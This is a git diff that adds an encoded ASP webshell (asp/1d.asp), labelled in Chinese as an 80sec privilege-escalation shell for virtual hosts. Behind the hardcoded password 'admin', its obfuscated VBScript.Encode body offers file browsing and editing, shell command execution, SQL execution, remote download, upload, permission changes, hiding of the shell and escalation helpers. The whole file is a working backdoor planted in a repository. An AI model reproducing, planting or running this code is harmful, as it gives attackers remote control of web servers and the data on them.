diff --git a/asp/1d.asp b/asp/1d.asp new file mode 100644 index 0000000..cd9f7d1 --- /dev/null +++ b/asp/1d.asp @@ -0,0 +1,7 @@ +<%@ LANGUAGE = VBScript.Encode %> +<%UserPass="admin"' 密码 +Server.ScriptTimeout=999999999 +On Error Resume Next +mmname ="虚拟主机提权专用Webshell去后门版" 'shell标题 +mmshell ="虚拟主机提权专用Webshell 80sec出品" 'shell版权 +errout ="傻逼与狗勿猜解本人密码" '密码错误提示#@~^sG0BAA==@#@&@#@&k+M\+M/KWY{In;!+dOc?+M-+M.lMrC4^+k`E/n.7+.{kG0DhC.J#@#@&EORO R OR O OO O RO ORO ORR OO RO OO RRO O O@#@&.nkwGxknRSDrOPJEQ74/DdW3JE3\(ZDd03EJ@#@&]+kwGUk+R~;06+D,x~KME@#@&@#@&/}1jK|o?}'Ej1Dk2Or[Ek Lcsr^JLJ+UXkOJLJn:}4%n1YJ@#@&B把路径加入,-P@#@&WE mDkGx~!YoE^snmY4calY4b@#@&7MOwEs^nmYt,',2lDt@#@&ikW~"ko4O`alY4Sq#,@!@*PE-E~Dtnx,!+Ds;s^nlO4,'~wmO4[E'J,B如果字符最后不是P'P的就加上@#@&+ N~0!x^ObWx@#@&B删除文件@#@&s!U^YbW P9+sO6O0bs+v0rswlO4*@#@&P}U,2.MWMPI/!h+,1n6D@#@&~U+Y,G4Ns?}~xP;DlO+68N+^Yv/rg?Pmw?rb~@#@&~PbW,W8NsUrRwk^n2XkdYk`Wr^+wmOt*PY4nUPE检查文件是否存在P@#@&~P~G(Lo?} fVnOsksnv0rV2mY4*P@#@&P,+ [Pb0~@#@&PjnDPW(%sUrP{~UWDtbxL@#@&~G+sYaY6ksn,'P3.MRHEs8D~E返回错误码P@#@&2 N,oE mOkKx~@#@&B检测目录是否可写PZ~为可读写P8为可写不可以删除@#@&w;UmDkKx~Z4n139kM(/}| .bY+c9bDjYMb@#@&7}x,2DMWM~I/;:PHnXY@#@&7?YPwj6P{PU+.\n.cZ.+mO+}4%n1Y`/6g?P{wj}#@#@&d6kVwmOt,'~MYo;^VnmOtvfkMjOD*[6/GR!nDYn:aHls+@#@&is?6 ;DnlDn:+aDsbV+v0bs+alOt*P@#@&iZt^3GkD&d6|qDbYnPx~AD.Rg;:(+.~E返回错误码P@#@&7b0~PU4KhHKMkYfb.Pmx[PvZ4n13fb.qkr|q.rYP{GT#~O4+U@#@&7d"+d2Kx/n qDrY~r$@!6W YP1W^GD{aT!+voo@*目录@!z6GxD@*Tr'9kM?DD'J~,@!0GxD~mKVG.{D+[@*r[3DM G+d1DbwYbW 'J@!zWW Y@*D@!4D@*E@#@&d+ [~k6@#@&dd+O~6W;Y,x1KY4r o@#@&7k+OPwj}Px,1KYtbxT@#@&ifnVD+aO6kVc0bV+aCOt*PE删除掉@#@&drW,Z4+1VfbD(d}|.rD+x!,C N~G+^Y+XY6rV`Wk^+2CDt#{{!,YtU~Z4+139k.(krFMrYPxq@#@&+U[,s;x1ObWU@#@&E检测文件是否可以修改`此方法是修改属性~可能会有点不准,但基本能用*@#@&WE mOkKx~/4+m0ok^+MrO+v0bVnwCO4#@#@&i6x,2..KDP]nkEh+,H6O@#@&i?+DPwjr,'~?D-nMRZMnlD+r(%nmD`;rH?Pmw?6#i@#@&i/nO,o+O)DYxsU6cMnDsbV+v0bs+alOt*@#@&7T+YzOYcbYD.r4!Y/~'~LY)YD bDY.r(EYnd@#@&~P;4mVwk^+MkDnP{P3DMRH;s4+M~@#@&d/O~sUr,'~1GO4kUo@#@&dk+O~T+Y)ODPxPgGDtr o,P@#@&+ [P6EUmDkGU@#@&B检测目录的可读写性@#@&0!xmDrGx,?4WAfr.qDrYmfbDmobV+cKmY4~;4mVwk^+~;t^3g+aYGk.b@#@&d}UPADDK.~I/!:nPHnXY@#@&ij+DPoj}P'~jD-+M ;DnmYr4N+1O`;rH?:{oj}#@#@&7A,'Pwj6RwW^NnD3ab/O/vKlDtb@#@&d/nO,sjr{UKY4bxT@#@&i@#@&~PE是否为临时目录和是否要检测@#@&P,qjm:2Hhmf&IP{7ck /DDcj/Ck+cnmOt*~E &1f6 U-P2tKr#@*Z#,lx9PgGZ4+^3:+h2@#@&P,7d@#@&dbW~A{0mVd+~O4+UPE如果不是目录就进行文件检测@#@&iBxx{''xx{'x'{x{'x{'{''{'{x'{'x'{'xx{''{x'{''{xx'{'{'x'xx{'x'{x'{'xx{''xx{'x@#@&7iIn,',Ztm0ok^+ DbYnchlY4bPE检测是否可写@#@&i7r0,IPx!~O4+U@#@&7diIndaWxdnc.kDn,J,文件Y@!6WxDP1GVKDxDN@*ELnlD4[r@!z6GUY@*@!(D@*J@#@&id74,xYMEn@#@&dd7nXkOP6; mObW @#@&ids/@#@&did]nkwW d+cDbOnPr$@!0GxO~1WsWMxDN@*文件@!J0WUO@*TE[hCDt'rP]@!0KxD~mKVGD{Dn[@*J[A.Dcf+k^.kaYbWU[E@!J0GxD@*T@!4.@*rdd77id@#@&i7i+abY,0E mDrW @#@&di+U[,k0i@#@&iB'{xx'{'{'x'xx{'x'{x'{'xx{''xx{'x'{x{'x{'{''{'{x'{'x'{'xx{''{x'{''{xx'{'{'xd@#@&i+UN,r0@#@&7KmYt~x,MnYw;^VKmY4`nmY4bPE加Pwd@#@&7@#@&dD~',Zt^VfbD&/6| .bYn`hCY4#~v当前目录也检测一下@#@&drW,`.+,xZ#~KD,`D'8bPDtnx@#@&77"+/aGxk+Rq.rYPr$目录D@!WG Y~mKsWM':TZ!!oo@*J'PhCDt'r@!J0W Y@*@!4M@*E@#@&dnU9Pk6@#@&U+Y,ojr,',?nD-nMR/DCYr8%mYc/}1jK|oUrb@#@&k+Y,0,xP6/GRT+OWKVN.`hlY4b@#@&b0,`/tn^0srVxKMEnb,lx[~vqj{:3tnmGq"'0mVkn#,Y4+ @#@&8{0l^d+@#@&B{xx'{'{'x'xx{'x'{x'{'xx{''xx{'x'{x{'x{@#@&0WMPCm4PWk^+~r P0cok^+/@#@&7IP{P/tn^0srV DbYnchlY4'6ks+cUm:n*PE检测是否可写@#@&ik6~IPx!,Y4n @#@&i7I/wKUd+cMkO+~E]文件T@!0KUY,mGsKD'.n9@*E[,KmY4L0bV+cxmh+LJ@!z6WUO@*@!4M@*J@#@&di8~'DD!+@#@&7n^/n@#@&7db0~j4WhHGqDrY9bD~DtxP"+k2W /nRqDrOPJ]@!0KxY,^GVKD{DnN@*文件@!J0GxD@*Tr[KCDt[Wr^+ xmh[E,$@!0W Y,^W^W.'M+[@*r[2M.RG+/1.rwDkKx'J@!&6WUY@*D@!(D@*Eidd@#@&i+UN,r6@#@& +XY@#@&k6~4,Y4+ P.nkwW d+csV!d4PE如果有内容就刷新客户端显示@#@&Bx'xx{'x'{x'{'xx{''xx{'x'{x{'x{'{''{'{x@#@&+UN,kW@#@&B'{x'{''{xx'{',目录检测Px'xx{'x'{x'{'xx{@#@&WGMPnl14,0r^+,kx,0cjE(sGV9+.d@#@&k6~Z4+m0Hn6DfbDx0Csk+~Y4nx,B是否检测下一个目录@#@&iD+~x,Z4+1VGk.&/}|MkDn`hlOtL0rsRxmh+*@#@&irWPvDPx!b~KD~`Mn'8#~O4+x@#@&id]+k2KxdRqDkD+,E$目录Y@!WW Y~^KVWMxaZ!v+oo@*r[,nCY4'6ks+cUls+'E@!z0GUD@*@!4M@*r@#@&i+ NPb0@#@&+ N~k6@#@&7@#@&dbWPvZt^V16DfrDxPMEn#,Cx9Pc(U{K3\h{9q"x6lsk+*PY4+ ~B是否检测下一个目录@#@&7di?4GSfkM DbY+|9rD|sbVnPKCDt'0bs+cxCh~Z4n13ok^nBZ4m01+XYGrD,B再检测下一个目录@#@&i+U[,k0@#@&x6Y@#@&v'{'{'x'xx{'x'{x'{'xx{''xx{'x'{x{'x{'{'@#@&?OPw?6P{PHGDtk L@#@&/+D~WP{PgWOtrUT@#@&+ [P6EU^DkWU@#@&?nD7nMRj1DbwY:ksnW!Yx,O,11O,,OlI/wKUd+cA!0W+.xDD;+=6x,2..KDP]nkEh+,H6O=@#@&26Z!O+,JdE(Pj4Kh2M.`*)q6~3DMP:tnxl]"?EJ@!8D@*@!C~4D+WxELC\md1DraY=tkkYK.Xc4Cm0`bv@*@!4M@*[ 4/aIEJ,[,2.D 9/^Db2YbWU~LPJE@!Jl@*@!(.@*JE=2MDR;VCD=In/aWUdRs^;/4)2 [~q6)x[Pd;(J@#@&U;4,I]jv/Y.b=Dn/aG /nchMkY`kOD*)3x9Pj;(@#@&w;x1YkKU~InmY4`jb@#@&]+hCY4']naVl^nv?SJ'EBJw'J*@#@&Ax9~s!x^YbWU@#@&sE ^YbWx,]]+hlDtc?bl"InnmOt{In2^lmncU~E-'EBJwr#@#@&2 N,oE mOkKx@#@&`IS{]+$E+kO ?D7+..C.bl8Vd`rj]Jr#@#@&jD-+M(h'];!+/DRUnD7+..mDrC(V+kcJdrZzJmbGf"Jb@#@&)1YrW xI;;nkY`E)1YrW E*)KK/{ @#@&IKGYhlOt{?n.7+Dc\lanlD4cJcJ*@#@& "WGY{j+M\n.cHl2KmY4`r&r#@#@&?D\D!xD;;+kY dD\.\mDkm8s+k`rtOY2m4WdYrb[!Ds@#@&NWhCbxxD5!+dDRk+D7+M-lMkC4^+dcrtYD2{4W/DEb@#@&sKV[+.KmY4'"n;!+dOvJsGs9+.nmO4Jb=@#@&nx{wKdeWclsglhn{I+$;+kY`roHls+r#lwdG{*lAm^3`Dsxr@!4.@*@!4.@*@!^xOD@*@!l,tMn0{B%l7ld^MkwDltb/YK.zR(l13c#v@*返回@!zC@*@!&mxOnM@*J@#@&"IjJ@!4D:s@*@!s+YmP4OYaOn;!k-xrJZKUYxY PzwJrP^WUOxO'rEY6O&4Y:sI,m4lMdYxT4y&FyJr@*J@#@&]IUJ@!ObYV@*JL:: Ch+LJ,O~J'jD-+M(nLJRRUW0O~ PE[knM\nM/K0YLJ@!&YbYs+@*J@#@&"I?,EJLmWaz;D^[rJ@#@&..UJ@!/DzVPOza+'EED+aYJ^k/Er@*r@#@&MDkE4KNz~DNS^xY.~^l4s`0KxDOdk"n=Pq aai(l^VTDW;U9O^W^GM):2%2%&Ri,^W^W.)[!TW6!!pjZ"rSd$)I szZ3O/6dr]),:!Z!TTZiPj/"rJS~)"Ou&M_SqVC:RZ}S6I=P:TZ%!ZTi,?Z"6JS~b"OjC)9}RZ}Jr")~:Z!%TTZi~?;]}SJ~b"O&GS&!C:O/rdr]l,a!ZosZ!i,j/I}SdA)IR)"I6 /rdr]l,a!TTZ!Ti,j;I6dS~bI K")ZnO/rdr]l,a!ZT!Z!i,o61:Owb\qJe=P-+M[l lI~UZI6JdA)I 9zIFUCzfrqO;6S}IlP[!TTZ!!)E@#@&DDkErxaED~d+sn1YSYaYmDnCPAr]9AIRK}K (GK_)P8wXIPwrHK 3(VCK=~4KVNp~$r"fAIRS3o:O qGPC=Pq2XiPo6gKR?&tA)~8 a6i,A}]fAIRSAsPR;rS}]),a!Z0T!Zi,A)ZF!"ri1GlP[&0fR&%I~~r]fA] A6:K}HOqqGPC=PqwXi~$}IfA]O~rK:6\O;rdr])~:Z!0!ZTi,Z6J}I)~:Z!W0ZTpP$}IG2I K}KO;rJr")~:Z!%ZT!pPs}HPOwbtqJ5l~7+.NmUlpP$6"f2]R"q!C:Rqq9:C=PFa6p~A}I92"O](VCK /rdrI=~:!Z%Z!T8E@#@&D./r4DPmGsKD):TZ0W!ZNr@#@&MDkJR; (Cm0o.W!x[R1WVK.)[!!ZI8WMNDl!2a)J@#@&M./rR^h9 4C^0o.W!U9O^KVKD)[!ZTi1WsWM):ows8r@#@&MD/r8GNH sl.orU=PTwXI:mDLr OVnWD)*wXI)J@#@&DM/J~rGe 1WsWM):fR&%208r@#@&M.dJm 1WsW.l[!T%ZT!pYnaDONn^KDCYbG )~ W +i)l=4W7+. 1WsGM)aZT06!!p8Cm0oMW;x[l[!T!)E@#@&D.drRlh`1WsWMl[%0Ri6WxDOkry)q a6INr@#@&M./r@!zkOzV@*r@#@&D]dr@!&/DzV@*E@#@&26n/!YnPUr 0GAxvJVADMGD{3rV +..KNWS Wp8hbU~YME+OE.Uk`b M3DMW.~0kVs^DkGxD@*6EUkmMkw{Lm-lTECoY~smx/1.kaIIU=@!Dki?=s/nI)DUP6CPM+O;p+Vdn,Y.EnDE. U?##M此操作吗?确认要执行DscU?mGx6k`r6P`kG3v#W ~z+!x1YrI]j?0==vbi)U;8skYG.sRdl9[M0IDWaRW^N.+,'~sc\Cs!DnmOtwWV9nWWM:cRCN[.* OWaGV9+.[D`oGSsGVKU,?4!x1Yk"IU=0#U=i)8~x,UU7CV!+1mhnRKDsRotr[0`YK2R)+sdkYcbpRdE(h0GM:aRtbNKUiDWob1Yr;P',UR7lVz^OkK0KDhR 4bNn#POWa'U;^V1Ch"Nk6cG+.?UpUU}Y4h+,'~+PfHCp8+^dfgl:;nP{PR-ls w1C:WWM:2 4kNnbpYG~wHm:存在!=?意文件是否全名称~注tN4文件入要压缩的vU?请输.WswO+,'~2Pf1mhN(UU*2CmDH?U/WhrKxx'vob1Ydn,k0nI)+sPGHm:s!+,':R7C:csHl9+WGMWwc4ks+#pO=~w1m能同名!U称S注意不4文件全名新建的\[?请输入要:2Yv=',w.Ggl:n~?Ub GOH[(U;D+mW x'?s)mDkn~b0`pN+^/fgCh+!+,'~+ -mV sgC:0G.swR4r9+biDGBsHm:全名称?U建的文件夹请输入要新wD`?=PaDG:m:n~{U#P91^N+M=H+SsKxx'==zmOkK~k6`oNV/nHm:ni-=?_9?U-uuP3xPc\CV!sHCs+0K.:cRtb[n#pYKwo1Ch名称U=~标文件夹全入移动到目v=U请输MWh2D+Px~a 91mhD=?#sW^N?=HK\rW 'xcwbmDd+,k0IN+^_G1C:kk-U=',=U-V;n,_:n 7lhRwHmNn6WMWwctbh+*iOUBsHC夹全名称?到目标文件请输入移动wYv=U,wDKhC:P{Ub 9H^NnD?GwHsGx{UU/^DkGxbWvs)Vk+Pm:I8?UQfgUkk-uP3xP?\l^;n1m:RGDh wtrNWiDW2 gl:nb称?USs标文件全名入移动到目v=?请输DGswD+P{Pa`fglhVU=bK\+wr'{UUt^OkKxb0cs)n^/nPmh+p8==3f1=k-ukP3x,U-mV!+1m: WM: s4k[n6iYK2Rgl:b称=UBs标文件全名入复制到目vU=请输DGhaYnP{~wPfHCsV+==*W2Xwr{'=?Z1YkKxbW`wbHls+In,'Pw \mVEwHC:0KDhR 4bNn#POWamOrKx:nSwbh`wHmVswWMWx,s!;x1YrI"?=W?J~hdW*@#@&"]jJ6E mOkGU,f8Z4nm0`b`b0`98wW.:c9(?OMR7lV!+,x',JEJr#`C^+DDcJr请先连接数据库JJ*IoE^VG4jY.cZ#IDOEMx~WmV/nI)DnY!. POMEi8r)"]?r0;x1YrG Ps!sVG4?D.ck* b0ck@!T* .+D;D PWC^/+INUY.P{~ +A,bMDlH`8+#p?OD]!D~{PJrKDK\k9n.'tk1DG/GWDRB+D rd29$ccRTIGlOl,jKE.1+{J["+hCY4`j+k/rG `JwGV9+DhCOtr#*[E-w[(RhN(I9Y~6d2f$lGlOl(Ck+~hlk/hKD9xeCeEJp?O.]FT,xPrJfMr-+M'P?5V~jD-+MNiU+.-D'E'U+.\.&n'r~8c&2iGCYm4C/'98gl:IjbN'kCInSN{eMeMErijYM, YPx~rJf.r7+.'P\H?5^8p?+M\.'r[j+M\n.&n[rInKDY{ff!+iGlOl8Ck+xf(Hls+IibN'.GKYInS[{eMCerJiUYM,&YPxPrJ9d 'fkU1m:+rEI?DD]cDPx~rJj2d3Z:PM~wIr\~]KC4^nglhT,CAIA~qG@!q!ZJEIUYD]XT,'PrE(1U2"K~qHP}P,Km8V1ChT`ijAISnzjU#~jbdj2U`'vEk+.xm:nwE~-E2lk/hK.[-E#rJI?O.]vDP{~Jrf3JAK2~o"r\P]Pm4s1m:+YPqu2"2~qG'qTZJJpjYM$GY~xPrJ`n9bP3,$Pl(s+glhnYP?3P,jj2"x'B;k+Mxls+'vPqC3IAP(9{F!ZEJp?YM,0T,',JEZ]3zK3P:)Ad2~,:l4snglh+Yc&f~&1:PqG2gPq:5~`8~qb,1r:~1`SSBij2"Pjb]Zu)"`X!*bJrijOM$,D~{PEJG]}n~:b~S2,$:C4^+Hls+DEri?D.$8!T{~EJzS:2]PP)~S3P]Pl(VnHm:+D~zf9P;6dj\gPhb?UPj)I;C)Iv&+brJiUOD]FFYx~JrbdK3I~PzAJ2,,Km4sngl:nD,f]rh~;rJ`HgPnz?UEJp?OD]F+D{PJr当只显示一条数据时即可显示字段的全部字节,可用条件控制查询实现 - 超过一条数据只显示字段的前五十个字节(JrIr0vk@!'f#`9(sGDs f(?O.c\ls;PxPUOM$rYiG4sKDs ?$VjYMR-C^E+,xPrJJrIC41RbxU+.u:HJ'rE@!1+UOD@*请确认己连接数据库再输入j}d操作命令语句*@!z1n YnM@*rJi)+^d+,kW`b'xqy# ms+MY`UO.$bT*iN+sd 94wGDsRj5^?Y. 7lsE~{PjDD]kTp8MnY!DUPDD;np8J=]IUJ0!U^YbW PoEssU;s?D.`kY.Sao#`r6`94wGM: G4UYDc\msERs+ oO4@!*#PCVDYvEE请检查数据库连接串是否正确"rJ*i.+O;Mx~0ms/iNr6`/O.cVnxTO4@!qZ#PlVDDcJr请检查?}S语句是否正确eJEbpD+D;D P0msd+p8G4oW.hc?5VUODc\Cs!+Px~kY.iG8wW.sRhloR7CV!+~',wLIm4mcrx +D_P\S{JrJEi98wW.:cdE(:rOv#i.nDE.x,OMEnp8r@#@&"IUE0!x^YbWU~TWYKiId`Ym.L~k+^r8LS./OWMn#PkWck+V68NRGwDrKxd]/Vr(Lcd+^+^YN(U9+6Y Lk''8b`+7l^`d+s6(L WaOkKxd,k+V68NRd+^n1Yn9q N+XTc-l^En#pkW~vD+kOWM+#,dnV}4NRd+sn1YnN&UN6xT)+VdnP+-l^cDl.T_rJR^W1CYbWU'EJEQk+V}8LcWwDrGxk$k+sr8%c/nV^YN(U9+6D 7lsEQrJvrJ*ik6Pv.+kYGD#~dVr(%Rk+V^O+9q Nn6xTp8N@!JdmMk2O@*J@#@&.M/~J@!8KNzrP@#@&q6Pz^YbWU'rJ~O4+x,]IUPJ,d^DKV^'UWE@#@&D./,E@*r@#@&9b:PjGD`q&B+*)jKYv!~Z#,xPr?^DbwOr oRwrV?XkOn:}4N+^YElUWO`ZS *Px~r文件操作组件J)jGD`q~Zb,'~rhkmDbwD /4+sVr)jGD`FB+#,'Pr命令行执行组件El?KYv S!b~{PEbG6(cZCOmVWLE=?GYv+B b,',Jb;ZAj?建库组件r)jWD`fSZ#P{~JxIrcBnYAxTkU+ElUWO`2S *Px~rbZ/3U?压缩组件E)UGD`*B!*P',JU^DbwOk o 9bmYbGxmDXrljWD`W~+#~x,J数据流上传辅助组件E)UGYv*ST*P'~EzNGN( 1WU +1YkKxrl?KYc*B b~{PJ数据库连接组件rl?KY`+ST#,',J)NG[(RjYMnlsJljKY`Sy#~',E数据流上传组件r)jKYvG~Z#,xPr?G0Db.Ob/l dRwkVi2J=?KYcGS+*PxPrjb srsjw~文件上传组件E=?GYv0B!b,',JSH0`2VKl[R`wsGmNsbs+r)?KOc%B *PxPE刘云峰文件上传组件E=?GYv1~Z#~x,Jnn.kkO/ciaVGmNcFJ=?KO`O~+#,'~Ez?n`2VKlN,文件上传组件El?KYvFT~Tb,'~Jx\lbV jsYw\CbVE)UGD`qZ~y#P{PrBHmksP邮件收发组件r)jGD`F8S!*P',E/f}1:? 1nAtlrVrl?KYcq8~ b~{PE虚拟?tPh发信组件JlUWD`Fy~ZbP{PE?sY2\mkVcj:DwHmrsR8J=?GYcqy~+#,xPr?hOaHlrs发信组件r)jWDc8&SZ#,'PrHb^DK/G0DRp\dCK:KJ=?WDcq&B *PxPE数据传输组件E@#@&oWM~k{!~PKPFf@#@&?nY,P{?nM\DR;DCYr8LmOcUWYvr~Z##@#@&(0,OyF*G++8!T*,@!@*,2..,KtnU@#@&(/}8N'E,√J@#@&2^/@#@&&/64N'E~×r@#@&A.DcZVC.@#@&2 N~qW@#@&?nY,P'gWO4bxo@#@&UWO`bS8#x&/}4L@#@&gn6D@#@&q6PoG^N+MKlDt@!@*EEPDtx@#@&jnk/rW cJwWs[DnCO4Jb'"]nCDtvsW^N.nmY4#@#@&3U9Pq6lq6P?ddkKxvJoWs[DKlD4J*'EE,KtnU@#@&oW^[DKmY4'IKWDKlDt@#@&U+ddbWxvEsKVN.KlDtr#xsGs9+.nmOt@#@&3U9PkW@#@&s;x1ObWU,HmkxwWMh`*P@#@&"IjE@!0WMhP l:xEJ4k9+WW.hrJ~:OtKNxErwWdOrJ~l1ObWU{JrJ[`Id'JrJ~YmDLnD'Jrok^+sMCh+rJ@*J@#@&]]UJ@!k 2EDPOza+'EE4k[NUrJ~ ls+'rJz^YbWUJr@*E@#@&IIUE@!bxw!O~YHw'EJ4r9NnxrEP lhn{JJoHm:nJr@*r@#@&"IUJ@!J0K.:@*J@#@&"IjE@!YD@*p→@!mPtMnW'ELm\C/^.bwO)U4WSsGs9+DcErZl-'KMWLMlsPsbVdJr#v@*hDGLMl:@!&l@* 2→@!C~tM+6'vLC-m/^Db2Y=?4GSsWs[DcJr/=-wGW1E:xDdPmx[PU+OObxokw-zVV,id+M/'-EJbv@*bsV`d+M/@!&m@*x:→@!mP4DW{B%m\m/mMkaO)UtGhwWs[D`rEZ=--GG^Es+ YdPCU9Pj+DOk odw'bVs~`/nDkw'=开始n菜单'-程序'-Jr#E@*程序@!Jl@*k(→@!C~4D+6xBNl\md^DbwD)jtGAwWsN.`rJ^l'-fG^!:nxDd,lU9PU+YDk L/'-)V^PidD/'wl开始a菜单--程序'w启动EJ*B@*启动@!&l@*r(→@!CP4.+6'v%m\ld^Mk2Y=j4WAwW^N+M`rEZ=-wfKm;hxYk~l NPUnOYbxT/w-)s^Pi/./'-)2aVk^CDkGx,9mYC'-UX:mxDnm'-2mzxzA4+Dw-rJ#E@*2mzxHh4+.n@!zC@*d\→@!mP4.0'v%m\C/1.bwO=?4WhwW^[+M`EJ1)wwhDWT.lsPsbsn/'-k+.\R;'-EJ*v@*k+.- E@!&C@*f-→@!m~4Dn6'ELl7lk^DbwO)UtGAwWV9nDvJJ;lw-GW1Eh+UOkPCx9~?YOr o/wwzVsP`dDd'-zww^k1CYbWUPGlOC'-Hb^DK/W6Ow-t+9kCP(U9+a-'EJ*B@*@!6WxO~1WsWMxM+[@*U星外常写?@!z6W O@*@!zC@*=”→@!C~4D+6xBNl\md^DbwD)jtGAwWsN.`rJ/l'-n.GTDC:,obVnk-'Hk1DKdW6Y~?5S~jD\.-'JJ*v@*?5S@!zC@*(B→@!l~tMn0{B%C7l/^.bwO)U4KhoKV9+DvJr^)'-KChJEbE@*n_K@!Jl@*A9→@!l,tM+W'v%m\C/1.kaYlj4WhoG^NnDvErZl'-qq1Grqj-'/z/D+hfy--1Gx6ko'wEJ*B@*mGxWrT@!&l@* n→@!l~4M+0xvNl-lk^Mk2D)UtWSsKsNDcJrmlw'qg9rq?-'dz/D+s&+-wr +O/M--'NCOm--EE*B@*NmOm@!&m@*s@!mP4.+6'vLm\Cd1DkaO)UtWSoGV9+M`EJ^l'-Ak [WS/ww:+:2w'JE#E@*:+ha@!Jl@*sg@!CP4Dn0{B%C7l/1.kaY)U4GhwW^NnDcErZl-']2;5/JAI-wEr#v@*"3;5/d2"@!zm@*7S@!mP4D0xvNl\mdmMkwDljtKhwWsNn.vJEZ=w-GW^;s+xOd,lUN,jYObxT/-'b^sP`/nDk-w9KmEsnxD/-'EE#E@*常写@!zC@*{@!b:LPk.m{B4Or[JO2=z&tW^0 8cmK:zS+(&wM &gr[[Gslk 'JE@*@!Jrho@*J@#@&vn]调用地址@#@&I]?r@!Ym4sn,hk[O4'vFZTuB@*r@#@&IIUJ@!WWM:~xm:nxElN9.0KD:E~h+DtKNxB2GkYvPm^YbWUxEJ[i]d[EB,OmDLY{B{alMnxDB@*J@#@&]]UJ@!D.@*@!YN,ArNDt{B*!v~mVro xB^+WOE@*地址:@!&O9@*@!Y9@*r@#@&"IUJ@!bxa;Y,xC:'voKVN.nmYtE~dYHV'vhr[DtlFZT]EP-C^E+xvr[j+kdbWUvJwWV9+MKlDtE#LJv@*r@#@&"]?r@!zD[@*@!DN,hrNO4{B{!E~l^kLU{BmnUD+.B@*@!bx2!Y,xls+{v?!4hkDB~OHw+{v/!4:bOvP7l^En'v!}M6B@*EP@#@&]]UJ@!&O9@*@!zD.@*@!&6WM:@*@!zDC4^+@*J@#@&]]UJ@!DC4^+PSr[Y4'EFT!Yv,tnkT4Y{B1uBPdOHVn'E8KD[D=FwXPkGVbN~aZ!0TZ!iE~mVVaC[NbxT'v!v~1+sVk2l1kUL{B!v@*r@#@&I"jr@!O9PSkNDt{vF2*vPbNxO^@*J@#@&I"?J@!rWDm:PUlhn{BJ+6OB,/.^{Bg)^DkGx{\mkUt+ EB,hb[Y4'vFZ!Yv,t+bLtD'B8TT]EP6DC:n8KD[+MxBZB@*@!Jk0.Cs+@*@!JO9@*E@#@&"I?r@!D[PSk[Y4'q~kYX^n'E4l1VLDKE NlaTTR!T!E@*@!JY[@*@!YN~AbNOt{q,/OHV'Bal9[k ol a6v@*@!lPKUm^km0xEJ9W1Eh+UOconYAs+s+UO~Xq[cEYsB* kYz^+cNkkw^CX{BUW +vErPtMn0{aa@*@!8@*隐藏@!z(@*@!zC@*@!w@*@!m~W msr13'EE9W^Esn Y T+D2V:UY~X(NvBOsE#RkOX^+R9rdw^lH'vBEE,t.+6xa[@*@!8@*显示@!z8@*@!zC@*@!&a@*@!JY9@*@!DN,Ak9Y4'8PdOHV+{v4mm3T.GE N=aT!0TZ!v@*@!ON@*J@#@&"I?E@!b0.lsn,xCs+{BsbVoDm:nB,/.^{Bgz^YbWx{j4WSFwks+v~Sk[Y4xB8!TYEPtnrTtO'EqZ!YEP6Dls+(GD9+.'E!v@*@!zk6.ls+@*r@#@&2 N,s;x^ObWU)w;x1YrG PHCr Hnx!c*@#@&"IUJ@!Dl(s+,hrNDtxv8!!uvP1+V^d2l1k oxBTv,mnV^2l9NrUT'BTv@*J@#@&"]UJ@!DD@*@!Y9@*@!4D,tro4Yxq,hk9Ot{BFZTYB@*J@#@&]IjE@!zON@*@!zDD@*E@#@&qW~kWP`ZS8#xrP×rPK4+ @#@&"IjJ@!Y.@*@!YN,4+botDxv WB@*无权限@!&Y[@*@!zOD@*E@#@&2sd@#@&jnDP)A;xg+A,S~s)"IU~b~Z ?4WA9Mk\.`*)?O~b~Z{1GY4r o@#@&"]?r@!O.@*@!Y[~4+ro4O{B+ZB@*P@!mP4.+6'vLm\Cd1DkaO)UtWSoGV9+M`EJE'"+KlD4`q ]KWYb'rJE#E@*→站点目录@!zC@*@!JYN@*@!JOD@*J@#@&"IjE@!YD@*@!Y9PtrLtD'E TB@*@!mP4DW'ELC-m/m.raYl?4GSsG^ND`rJr'InCY4`]GKYnmOt*[JrEbB@*→程序目录@!Jl@*@!&O9@*@!zD.@*r@#@&]"?J@!OM@*@!Y9~4+rTtD'By!E@*@!mP4D0xvQbmDrW 'oK8Cm0B,YCDLnD'vsbs+wDChB@*→上级目录@!&m@*@!zD[@*@!&DD@*J@#@&I"jJ@!Y.@*@!Y[~4+kT4Y{B Zv@*@!mP4Dn0xvNl-lk^DbwOlwEVsoKDh`rEr[]nmYtv?d/bWU`rsGs9+DhCY4J#LEw1hwWsNn.r#'JrE~rJHnSsWs[DEJ*v@*→新建目录@!&m@*@!zY9@*@!&YM@*E@#@&I]jr@!YM@*@!DNP4nro4Y{B+!v@*@!l~tMn0{B_)1YkGU{2[kDobVnEPDlDT+DxBwks+wDChB@*→新建文本@!&l@*@!zD[@*@!JYM@*E@#@&]"?E@!D.@*@!Y[~4+kL4D'v Zv@*@!C,tM+0{BQ)mDkGx{NGA VWm[/EPYm.L+D'EsrVnoMlh+E@*→远程下载@!Jl@*@!JYN@*@!JY.@*r@#@&I]UJ@!YD@*@!D[P4+ro4Yxvy!B@*@!l,tDWxBQb1YrWUx`wok^nB,YC.T+Yxvwks+w.m:nE@*→上传文件@!zl@*@!4.@*@!zON@*@!&OM@*J@#@&I"?J@!O.@*@!Y9P4+rL4YxByqB@*@!C~4D+WxEg)mDrKxxUmmxfMk7nsKDhB,YC.T+Y{vsbV+w.C:B@*→可写目录@!&0GUD@*@!zm@*@!JY[@*@!zY.@*r@#@&I"jr@!OM@*@!YN,tro4YxByFv@*@!lP4.+6'BQ)^YbW 'CYOv,YCDTnY{Bor^+s.Cs+v@*→修改权限@!&6WUD@*@!zl@*@!JON@*@!&YM@*E@#@&IIUE@!DD@*@!O[P4+bo4YxvyFv@*@!CP4DnW{Bg)^DkGx{4bN[xkt+^VE~YmDL+D'vobV+w.ls+B@*→隐藏大马@!&l@*@!4D@*@!&O9@*@!zD.@*r@#@&]"?J@!OM@*@!Y9~4+rTtD'ByFE@*@!mP4D0xvQbmDrW '0!"4ED;8B~YC.T+O'Eok^+o.m:+v@*@!0GxD~1WsKD{D+9@*→星外主机提权辅助@!&l@*@!&0KxO@*@!tD@*@!zDN@*@!&OD@*J@#@&]IjE@!Y.@*@!ON,tnrTtYxvyFv@*@!C,t.0{BgzmDrW 'WE.t;O$ 